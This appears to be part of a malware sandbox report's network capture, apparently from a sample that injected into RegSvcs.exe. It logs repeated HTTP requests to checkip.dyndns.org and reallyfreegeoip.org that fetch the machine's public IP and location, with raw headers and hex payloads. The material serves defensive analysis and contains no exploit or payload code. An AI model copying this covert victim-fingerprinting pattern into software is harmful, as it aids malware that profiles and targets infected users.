                                                                                                                    Dec 11, 2024 08:59:08.997108936 CET321INHTTP/1.1 200 OK
                                                                                                                    Date: Wed, 11 Dec 2024 07:59:08 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 104
                                                                                                                    Connection: keep-alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Pragma: no-cache
                                                                                                                    X-Request-ID: b954805518e0fd4a2ca628028088df6f
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    2192.168.2.449735132.226.247.73807508C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Dec 11, 2024 08:59:10.779278040 CET151OUTGET / HTTP/1.1
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                    Host: checkip.dyndns.org
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Dec 11, 2024 08:59:12.083074093 CET321INHTTP/1.1 200 OK
                                                                                                                    Date: Wed, 11 Dec 2024 07:59:11 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 104
                                                                                                                    Connection: keep-alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Pragma: no-cache
                                                                                                                    X-Request-ID: 23027fcc77eef91bab177e14b89a83e8
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    3192.168.2.449737132.226.247.73807508C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Dec 11, 2024 08:59:13.871773958 CET151OUTGET / HTTP/1.1
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                    Host: checkip.dyndns.org
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Dec 11, 2024 08:59:15.217556000 CET321INHTTP/1.1 200 OK
                                                                                                                    Date: Wed, 11 Dec 2024 07:59:15 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 104
                                                                                                                    Connection: keep-alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Pragma: no-cache
                                                                                                                    X-Request-ID: de05d29aa4db4772d2fce5c8c54099cb
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    4192.168.2.449740132.226.247.73807508C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Dec 11, 2024 08:59:17.039071083 CET151OUTGET / HTTP/1.1
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                    Host: checkip.dyndns.org
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Dec 11, 2024 08:59:18.355011940 CET321INHTTP/1.1 200 OK
                                                                                                                    Date: Wed, 11 Dec 2024 07:59:18 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 104
                                                                                                                    Connection: keep-alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Pragma: no-cache
                                                                                                                    X-Request-ID: 03b2ee4259c3f98e83ce8e093067f51d
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    5192.168.2.449745132.226.247.73807508C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Dec 11, 2024 08:59:20.220731974 CET151OUTGET / HTTP/1.1
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                    Host: checkip.dyndns.org
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Dec 11, 2024 08:59:21.540848970 CET321INHTTP/1.1 200 OK
                                                                                                                    Date: Wed, 11 Dec 2024 07:59:21 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 104
                                                                                                                    Connection: keep-alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Pragma: no-cache
                                                                                                                    X-Request-ID: b38959b95a84d1e511016daa1661853a
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    6192.168.2.449748132.226.247.73807508C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Dec 11, 2024 08:59:23.370296001 CET151OUTGET / HTTP/1.1
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                    Host: checkip.dyndns.org
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Dec 11, 2024 08:59:24.676857948 CET321INHTTP/1.1 200 OK
                                                                                                                    Date: Wed, 11 Dec 2024 07:59:24 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 104
                                                                                                                    Connection: keep-alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Pragma: no-cache
                                                                                                                    X-Request-ID: eec97b0962829dded16c5c9b76ebd51e
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    7192.168.2.449751132.226.247.73807508C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Dec 11, 2024 08:59:26.490787029 CET151OUTGET / HTTP/1.1
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                    Host: checkip.dyndns.org
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Dec 11, 2024 08:59:27.799544096 CET321INHTTP/1.1 200 OK
                                                                                                                    Date: Wed, 11 Dec 2024 07:59:27 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 104
                                                                                                                    Connection: keep-alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Pragma: no-cache
                                                                                                                    X-Request-ID: 441f3102a3b99f3cc3b19208404ba2d3
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>


                                                                                                                    HTTPS Proxied Packets

                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    0192.168.2.449731104.21.67.1524437508C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-11 07:59:05 UTC85OUTGET /xml/8.46.123.175 HTTP/1.1
                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                    Connection: Keep-Alive
                                                                                                                    2024-12-11 07:59:05 UTC880INHTTP/1.1 200 OK
                                                                                                                    Date: Wed, 11 Dec 2024 07:59:05 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 362
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                    CF-Cache-Status: HIT
                                                                                                                    Age: 83268
                                                                                                                    Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ky3bwKEhSHJf6xbIdkxhs7td%2BpRL%2FGttPyEkz6KkQiEQHZ%2BOjjN1vriJCdIW4ZhpJol6J%2FaCcptsq9tJFl2EPgR7nCzzrP0OAHjB%2FshJGtF7UxTII4cmIHYu0eBJ55z1XnygMOaT"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8f03eeea0bf04391-EWR
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=4879&min_rtt=1787&rtt_var=2687&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1634023&cwnd=236&unsent_bytes=0&cid=c03dad95ef3f56db&ts=451&x=0"
                                                                                                                    2024-12-11 07:59:05 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                    Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    1192.168.2.449732104.21.67.1524437508C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-11 07:59:07 UTC61OUTGET /xml/8.46.123.175 HTTP/1.1
                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                    2024-12-11 07:59:07 UTC873INHTTP/1.1 200 OK
                                                                                                                    Date: Wed, 11 Dec 2024 07:59:07 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 362
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                    CF-Cache-Status: HIT
                                                                                                                    Age: 83270
                                                                                                                    Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3vaUXHoXyazQ2aXzW5wkdaIWsq54Yb4BBXb%2BxfxTnJjBu40IAPu4NwVXsOycBz8TlHMReH6iKnlopHzUfFy4TsnBHPfiIj06J9mm6CsLDSYil8KlVoBblUXoyxEWv4bG%2BO7lhzO5"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8f03eef738b15e78-EWR
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1683&min_rtt=1680&rtt_var=636&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1711606&cwnd=252&unsent_bytes=0&cid=45f163553af2eb58&ts=456&x=0"
                                                                                                                    2024-12-11 07:59:07 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                    Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    2192.168.2.449734104.21.67.1524437508C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-11 07:59:10 UTC61OUTGET /xml/8.46.123.175 HTTP/1.1
                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                    2024-12-11 07:59:10 UTC879INHTTP/1.1 200 OK
                                                                                                                    Date: Wed, 11 Dec 2024 07:59:10 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 362
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                    CF-Cache-Status: HIT
                                                                                                                    Age: 83273
                                                                                                                    Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HEEDgyqBHpuM2C9JztC6eoogRu16hFZT%2FaG58ZDGt%2BJuXPIpZdK8g5eD5cqFqKDgQwu75z%2B78Xbceil7Fw3PrEK2KRoJI%2BqmGUql9qAdzNVbMcsP%2BSvcvJTMRfpiL74kc4iwJvEo"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8f03ef0a8cc741e9-EWR
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1758&min_rtt=1753&rtt_var=668&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1624026&cwnd=249&unsent_bytes=0&cid=7ea6ae45c67588db&ts=451&x=0"
                                                                                                                    2024-12-11 07:59:10 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                    Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    3192.168.2.449736104.21.67.1524437508C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-11 07:59:13 UTC85OUTGET /xml/8.46.123.175 HTTP/1.1
                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                    Connection: Keep-Alive
                                                                                                                    2024-12-11 07:59:13 UTC873INHTTP/1.1 200 OK
                                                                                                                    Date: Wed, 11 Dec 2024 07:59:13 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 362
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                    CF-Cache-Status: HIT
                                                                                                                    Age: 83276
                                                                                                                    Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZqnNYs6OssY6gAJcGjh1v0ZEmKOu83uPLYMQLBVl07CLuVjY7XTkXTwQAMnrDULYIEvMpI9vMOSuXAHJ2mlE50IE8%2BBD1wEzVN2%2FDKijbxkjRsnPx6lZoCFt75qy2AxMAFqgG8wc"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8f03ef1ddec243ac-EWR
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1747&min_rtt=1742&rtt_var=665&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1632196&cwnd=181&unsent_bytes=0&cid=df25c03405110996&ts=448&x=0"
                                                                                                                    2024-12-11 07:59:13 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                    Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    4192.168.2.449738104.21.67.1524437508C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-11 07:59:16 UTC61OUTGET /xml/8.46.123.175 HTTP/1.1
                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                    2024-12-11 07:59:16 UTC883INHTTP/1.1 200 OK
                                                                                                                    Date: Wed, 11 Dec 2024 07:59:16 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 362
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                    CF-Cache-Status: HIT
                                                                                                                    Age: 83279
                                                                                                                    Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BKtXIsGpOQ%2BEVrlVucz6%2FODIVQ8hYAkAbk%2BPXEZsB%2F9YdP5TgoItVjuHXi%2BsO71H5%2BXAt1fzasJsctrDRoh663R%2FjtHh2aph47V111A2ouvrJB74KXawXLa3wYMwzXy6Mw7ZfMV4"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8f03ef319bb38cc0-EWR
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1817&min_rtt=1815&rtt_var=685&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1593886&cwnd=219&unsent_bytes=0&cid=d5daced961dd3b88&ts=473&x=0"
                                                                                                                    2024-12-11 07:59:16 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                    Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    5192.168.2.449742104.21.67.1524437508C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-11 07:59:19 UTC61OUTGET /xml/8.46.123.175 HTTP/1.1
                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                    2024-12-11 07:59:20 UTC881INHTTP/1.1 200 OK
                                                                                                                    Date: Wed, 11 Dec 2024 07:59:19 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 362
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                    CF-Cache-Status: HIT
                                                                                                                    Age: 83282
                                                                                                                    Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3p%2BbFhRVYroQjO6kOfh1lJWROSD1NU2E2CAQgXA7bX6FpW3rBZeYo%2BkL2GkF4hYTjhK%2Fs8Nen7xszNZVRnjkFPjbYSCy13%2B6jRe%2FdeAAFop0QHv2aeE7l5o5taGTi94Iclvu%2BAon"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8f03ef4548768ca2-EWR
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=2023&min_rtt=2015&rtt_var=773&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1399808&cwnd=252&unsent_bytes=0&cid=d6962b72bd26235b&ts=458&x=0"
